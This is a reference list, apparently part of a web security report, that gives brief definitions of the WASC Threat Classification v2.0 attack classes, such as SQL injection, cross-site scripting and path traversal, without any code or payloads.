WASC Threat Classification v2.0 report

Why it matters

Web security vulnerabilities continually impact the risk of a website. When any web security vulnerability is identified, performing the attack requires using at least one of several application attack techniques. These techniques are commonly referred to as the class of attack (the way a security vulnerability is exploited).

WASC web application threat classification list

Abuse of Functionality: Abuse of Functionality is an attack technique that uses a website's own features and functionality to consume, defraud or circumvent access control mechanisms.

Brute Force: A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key.

Buffer Overflow: Buffer Overflow exploits are attacks that alter the flow of an application by overwriting parts of the memory.

Content Spoofing: Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a website is legitimate and not from an external source.

Credential/Session Prediction: Credential/Session Prediction is a method of hijacking or impersonating a website user. Deducing or guessing the unique value that identifies a particular session or user accomplishes the attack.

Cross-site Scripting: Cross-site Scripting (XSS) is an attack technique that forces a website to echo attacker-supplied executable code, which loads in a user's browser. A Cross-site Scripted user might have his account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the website they are visiting.

Denial of Service: Denial of Service (DoS) is an attack technique with the intent of preventing a website from serving normal user activity.

Directory Indexing: Automatic directory listing/indexing is a server function that lists all of the files within a requested directory if the normal base file (index.html/home.html/default.htm) is not present.

Format String Attack: Format String Attacks alter the flow of an application by using string formatting library features to access other memory space.

Information Leakage: Information Leakage is when a website reveals sensitive data, such as developer comments or error messages, which might aid an attacker in exploiting the system.

Insufficient Anti-automation: Insufficient Anti-automation is when a website permits an attacker to automate a process that should only be performed manually.

Insufficient Authentication: Insufficient Authentication occurs when a website permits an attacker to access sensitive content or functionality without properly authenticating his access permissions.

Insufficient Authorization: Insufficient Authorization is when a website permits access to sensitive content or functionality that should require increased access control restrictions.

Insufficient Process Validation: Insufficient Process Validation is when a website permits an attacker to bypass or circumvent the intended flow control of an application.

Insufficient Session Expiration: Insufficient Session Expiration is when a website permits an attacker to reuse old session credentials or session IDs for authorization. Insufficient Session Expiration increases a website's exposure to attacks that steal or impersonate other users.

LDAP Injection: LDAP Injection is an attack technique used to exploit websites that construct Lightweight Directory Access Protocol (LDAP) statements from user-supplied input.

OS Commanding: OS Commanding is an attack technique used to exploit websites by executing Operating System commands through manipulation of application input.

Path Traversal: The Path Traversal attack technique forces access to files, directories, and commands that may potentially be located outside the document root directory. An attacker might manipulate a URL in such a way that the website will run or reveal the contents of arbitrary files anywhere on the web server.

Predictable Resource Location: Predictable Resource Location is an attack technique used to uncover hidden website content and functionality. By making educated guesses, the attack is a brute force search looking for content that is not intended for public viewing. Temporary files, backup files, configuration files, and sample files are all examples of potentially leftover files.

Session Fixation: Session Fixation is an attack technique that forces a user's session ID to an explicit value.

SQL Injection: SQL Injection is an attack technique used to exploit websites that construct SQL statements from user-supplied input.

SSI Injection: SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a application, which will later be executed locally by the web server.

Weak Password Recovery Validation: Weak Password Recovery Validation is when a website permits an attacker to illegally obtain, change or recover another user's password.

XPath Injection: XPath Injection is an attack technique used to exploit websites that construct XPath queries from user-supplied input.